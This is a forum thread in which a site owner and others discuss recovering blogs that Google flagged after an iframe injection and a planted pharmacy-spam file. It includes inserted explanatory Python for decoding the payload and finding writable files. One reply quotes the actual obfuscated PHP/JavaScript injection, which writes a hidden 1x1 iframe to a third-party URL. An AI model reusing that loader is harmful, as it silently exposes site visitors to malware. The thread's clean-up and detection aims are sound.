Google quarantined me

nomos

Administrator
This morning I got an email from Google with the subject line "Malware notification regarding deeptime.net." At first, I thought it was a phishing thing but then when I visited my sites in Firefox I was greeted with the big red "Reported Attack Site!" page. See for yourself: http://www.deeptime.net/blog/

Looking at the diagnostic in Google Webmaster Tools I get the following message which suggests that it's not actually my site at all that's the problem but this davtraff.com. I did a quick search on the domain and found people saying things like "If I catch this davtraff guy I'll punch him in the neck."

Anyway, my site is fucked and I have no idea what to do besides submit it for a review. But if anyone can offer any ideas or help I'd really appreciate it.


What is the current listing status for deeptime.net?
Site is listed as suspicious - visiting this web site may
harm your computer.

Part of this site was listed for suspicious activity 1 time(s)
over the past 90 days.

What happened when Google visited this site?
Of the 4 pages we tested on the site over the past 90
days, 4 page(s) resulted in malicious software being
downloaded and installed without user consent. The last
time Google visited this site was on 2009-11-04, and the
last time suspicious content was found on this site was
on 2009-11-04.

Malicious software is hosted on 1 domain(s), including
davtraff.com/.

This site was hosted on 1 network(s) including AS26347
(DREAMHOST).

Has this site acted as an intermediary resulting in further
distribution of malware?

Over the past 90 days, deeptime.net did not appear to
function as an intermediary for the infection of any sites.

Has this site hosted malware?
No, this site has not hosted malicious software over the
past 90 days.

How did this happen?
In some cases, third parties can add malicious code to
legitimate sites, which would cause us to show the
warning message.
 

droid

Guest
I was running some WP blogs in work that got hacked with random links inserted into the text via javascript. This was inserted into each PHP file on the server:

<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

What version of wordpress are you running? I had to manually remove the offending code and upgrade.
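The script in that snippet hides its markup by storing every character shifted up by 2 and shifting it back at page load. Reversing the shift is the quickest way to see what was really being written into the page. The following decoder is an added example, not code from the post or from any of the sites mentioned; it takes the string argument exactly as it appears in the injected script (the `\"` sequences are JavaScript escapes for a plain double quote, so they decode to spaces) and adds a small heuristic for the 1x1 frames these injections produce.

```python
"""Decode the character-shift obfuscation used by the injected script above."""
import re

# Argument passed to count() in the injected script, copied from the post.
# In the JavaScript source \" is an escaped double quote, so the decoder
# sees character code 34, which shifts down to 32 (a space).
OBFUSCATED = (
    '>khtcog"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr"'
    'ykfvj?3"jgkijv?3"htcogdqtfgt?2@'
)


def decode_shift(payload: str, shift: int = 2) -> str:
    """Mirror count(): subtract `shift` from every character code.

    The shift is a parameter so the same routine covers variants that use
    a different constant (an assumption, not something the post states).
    """
    return "".join(chr(ord(ch) - shift) for ch in payload)


def looks_like_hidden_iframe(markup: str) -> bool:
    """Heuristic for the invisible 1x1 frames this kind of injection emits."""
    lowered = markup.lower()
    return "<iframe" in lowered and "width=1" in lowered and "height=1" in lowered


def extract_src(markup: str):
    """Pull the src= target out of the decoded markup (None if absent)."""
    match = re.search(r"src=['\"]?([^\s'\">]+)", markup)
    return match.group(1) if match else None


def analyse(payload: str = OBFUSCATED, shift: int = 2) -> dict:
    """Decode a payload and summarise what it would have written to the page."""
    decoded = decode_shift(payload, shift)
    return {
        "decoded": decoded,
        "src": extract_src(decoded),
        "hidden_iframe": looks_like_hidden_iframe(decoded),
    }


if __name__ == "__main__":
    result = analyse()
    print("decoded markup :", result["decoded"])
    print("frame target   :", result["src"])
    print("hidden 1x1 frame:", result["hidden_iframe"])
```

The decoded output is a borderless 1x1 iframe pointing at a third-party `.php` URL, which is why Google flagged the pages: the visitor's browser silently loads whatever that remote page serves. The `src` value is the thing to block at the proxy and search for across every file in the document root, since the same string is what the find-and-replace clean-up in the rest of the thread has to locate.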
 

sufi

lala
this happened to some of my webpages, i still am not really sure how - it looked like someone ftped in and added 3 lines of code to all html files, which downloaded some malicious javascripts that google disliked.
i did have to do a lot of find/replace, and change some passwords, but i was rehabilitated with google in a couple of days...

blacklisted by google = :cool:
 

sufi

lala
Scan type: Auto-Protect Scan
Event: Security Risk Found!
Risk: Bloodhound.Exploit.193
File: C:\Documents and Settings\!!sufi!!\Local Settings\Temporary Internet Files\Content.IE5\0S5524X9\freeLooks[1].swf
Location: Unknown Storage
Action taken: Clean failed : Quarantine failed : Access denied
Date found: 05 November 2009 15:08:22
nice one!
not sure if i got that off droid's rash C&P or off of deeptime itself
(also never realised ibn sina invented deeptime, just goes to show...)
 

nomos

Administrator
thanks guys. so it sounds like a pain in the ass but not the end of the world. i might have some questions later though as i'm still unsure where to start and i have to run out at the moment.

>> Wait, so is it google who've blocked the site or Dreamhost?
yeah it's google that does the scans and designates 'attack sites.' firefox and safari receive the information and generate warning pages in front of the sites. the only thing that dreamhost has done is repeat the warning to me when i go to my control panel.
 

nomos

Administrator
thanks again. i'll go through that when i'm home. so far I've found 2 of those iframes

>> What version of wordpress are you running? I had to manually remove the offending code and upgrade.
I think I'm on 2.5.7. Looks like the same route for me. Riddim.ca got hit with it as well. It's on Joomla rather than WP.

Find and Replace party at mine tonight :cool:
 

nomos

Administrator
So it's called an iframe injection attack. A couple of IT friends have sent some tips and links that correspond with what's been said above. Sounds like it's not very serious but dealing with it will take a while - lots of backing up, reinstalling, etc.

Some reading for anyone else who might have to deal with this sort of thing...

http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/
http://eisabainyo.net/weblog/2009/04/06/iframe-injection-attack/

I wouldn't be surprised if it came in via my very out-of-date Joomla install then spread to my wordpress blogs. It happened either through a compromised password or a worm on my computer, which I never expect, being on a mac.
 

Ness Rowlah

Norwegian Wood
>> Temporary Internet Files\Content.IE5

I am not sure, but if I take that as running IE5 then you really live in
the dark ages? There is no excuse for running that (unless you are at work and company policy and all that bollox).
 

nomos

Administrator
i worked on this til the wee hours last night and i believe i've cleaned it all up. riddim.ca was obliterated in the process but i still have the data so it'll come back in a while. unfortunately another sub site might be gone for good. anyway, just waiting for the green light from google now.
 

nomos

Administrator
NEW PROBLEM :mad:

The other day I Googled an entry on my blog and, in the search results, the page title had been hijacked by "Viagra, Cialis, etc."

It wasn't an iFrame injection attack this time. Instead I found a file called "whois.da" at the root of each of my domains. Had a look inside and it contained hundreds of links to an online pharmacy.

So I changed my FTP passwords. But just now I checked and it's back.

Searching "whois.dat" produces nothing. Anyone have any idea what's going on here? It seems less likely that WordPress is the entry point this time. All of my passwords are supposed to be very strong.
 

john eden

male pale and stale
Sorry to hear that Paul - what else was on the site?

I only ask because mine got hacked last year through the shop - I was using an out of date version of the software because upgrading was such a pain.

All they did was insert fake bank pages, so it was easy to stop.
 

droid

Guest
Do you have any out of date plug-ins or add-ons to the site? A .dat file is basically just a text file. The .dat files are writeable by the server, so typically when some attacker finds a way into your site (usually by exploiting some other out-of-date open source app) they write a little script to trawl over any writeable files in your document root and scrawl all over them with bad stuff. It might be an idea to check if there's any other writable files in there too.
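The check suggested in that post, listing every file under the document root that the web server (or any other local account) can write to, is worth scripting so it can be rerun after each clean-up. The scanner below is an added example, not code from the post or from any project the thread mentions; it builds a small constructed directory tree with the kind of permissions a shared host ends up with, including a world-writable `whois.dat`, and reports which files a mass-defacement script could have written into.

```python
"""List group- or world-writable regular files under a document root."""
import os
import shutil
import stat
import tempfile


def writable_files(root: str, world_only: bool = False):
    """Return paths (relative to root) of regular files that are writable by
    group or others. With world_only=True only the 'others' bit counts."""
    mask = stat.S_IWOTH if world_only else (stat.S_IWGRP | stat.S_IWOTH)
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode   # lstat: do not follow symlinks
            if not stat.S_ISREG(mode):
                continue                    # skip symlinks, sockets, etc.
            if mode & mask:
                found.append(os.path.relpath(path, root))
    return sorted(found)


def build_sample_docroot() -> str:
    """Create a constructed document root (sample data, not a real site)."""
    root = tempfile.mkdtemp(prefix="docroot-")
    layout = {
        "index.php": 0o644,
        "wp-config.php": 0o600,
        "whois.dat": 0o666,          # the sort of file the thread describes
        "uploads/photo.jpg": 0o664,  # group-writable, common on shared hosts
        "cache/page.html": 0o646,
    }
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("sample content\n")
        os.chmod(path, mode)        # explicit chmod, so umask does not matter
    return root


def demo() -> dict:
    """Scan the constructed tree, then remove it again."""
    root = build_sample_docroot()
    try:
        return {
            "group_or_world": writable_files(root),
            "world_only": writable_files(root, world_only=True),
        }
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for label, paths in demo().items():
        print(f"{label}:")
        for rel in paths:
            print("  " + rel)
```

Run it against the real document root by calling `writable_files("/path/to/docroot")` instead of the constructed tree. Anything in the `world_only` list is writable by every account on the host, which on shared hosting means every other customer's compromised site as well; the group-writable list matters when the web server runs under a shared group, since a script run through an out-of-date plugin executes with exactly those rights.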
 

nomos

Administrator
I've got several WordPress installs on there. I wondered last night if somehow they might be opening a backdoor, so I deleted the disused ones, updated the rest, and password protected a couple that needn't be publicly accessible. I'll weed out and update my plugins to see if that helps.

Frustrating if WP is the entry point but a little more reassuring than the idea that someone/something keeps cracking these passwords.

Thanks guys. ;) I'll report back.
 

droid

Guest
It may not have been a password crack. If you have old wordpress installs that haven't been updated then hackers can get in using published vulnerabilities, the same goes with plug-ins. If anything I'd say it's unlikely the passwords were hacked. It's almost certainly an out of date plugin or WP install.
 